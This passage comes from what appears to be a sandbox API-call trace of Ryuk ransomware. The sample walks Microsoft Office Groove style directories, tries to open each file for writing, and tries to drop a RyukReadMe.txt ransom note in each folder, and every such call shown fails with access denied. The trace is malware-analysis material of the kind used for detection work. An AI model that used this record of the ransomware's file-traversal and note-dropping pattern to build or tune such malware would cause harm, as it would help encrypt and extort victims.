returned 0xffffffffffffffff [0137.206] GetLastError () returned 0x5 [0137.206] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.206] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.206] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.206] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.206] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay.css", dwFileAttributes=0x80) returned 0 [0137.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\biscay.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.207] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.207] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.207] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.207] SetLastError (dwErrCode=0x0) [0137.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.207] GetLastError () returned 0x5 [0137.207] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.207] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.207] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.207] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.207] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.207] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.207] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange\\background.gif", dwFileAttributes=0x80) returned 0 [0137.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightorange\\background.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.208] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.208] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.208] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.208] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.208] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange\\BUTTON.GIF", dwFileAttributes=0x80) returned 0 [0137.208] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange\\BUTTON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightorange\\button.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.208] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.208] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.208] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.208] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.209] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightorange\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.209] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.209] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.209] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.210] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.210] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightorange\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.210] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.210] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.210] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.210] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.210] SetLastError (dwErrCode=0x0) [0137.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightorange\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.210] GetLastError () returned 0x5 [0137.210] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.210] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.210] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.211] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.211] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange.css", dwFileAttributes=0x80) returned 0 [0137.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightorange.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.211] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.211] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.211] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.211] SetLastError (dwErrCode=0x0) [0137.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.211] GetLastError () returned 0x5 [0137.211] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.211] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.211] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.212] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.212] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.212] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.212] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0137.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightyellow\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.212] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.212] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.212] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.212] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.212] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightyellow\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.213] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.213] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.213] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.213] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.213] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightyellow\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.213] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.213] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.213] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.213] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.213] SetLastError (dwErrCode=0x0) [0137.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightyellow\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.214] GetLastError () returned 0x5 [0137.214] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.214] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.214] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.214] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.214] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow.css", dwFileAttributes=0x80) returned 0 [0137.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightyellow.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.214] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.214] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.214] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.214] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.215] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Casual.css", dwFileAttributes=0x80) returned 0 [0137.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Casual.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\casual.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.215] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.215] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.215] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.215] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.215] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Country.css", dwFileAttributes=0x80) returned 0 [0137.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Country.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\country.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.215] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.215] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.215] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.215] SetLastError (dwErrCode=0x0) [0137.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.216] GetLastError () returned 0x5 [0137.216] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.216] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.216] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.216] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.216] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.216] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.216] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0137.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\desert\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.216] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.217] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.217] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.217] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.217] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\desert\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.217] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.217] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.217] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.217] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.217] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\desert\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.219] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.219] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.219] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.219] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.219] SetLastError (dwErrCode=0x0) [0137.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\desert\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.219] GetLastError () returned 0x5 [0137.219] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.219] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.219] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.219] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.220] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert.css", dwFileAttributes=0x80) returned 0 [0137.220] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\desert.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.220] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.220] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.220] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.220] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.220] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Earthy.css", dwFileAttributes=0x80) returned 0 [0137.220] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Earthy.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\earthy.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.220] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.220] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.221] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.221] SetLastError (dwErrCode=0x0) [0137.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.221] GetLastError () returned 0x5 [0137.221] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.221] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.221] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.223] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.223] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.223] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.223] 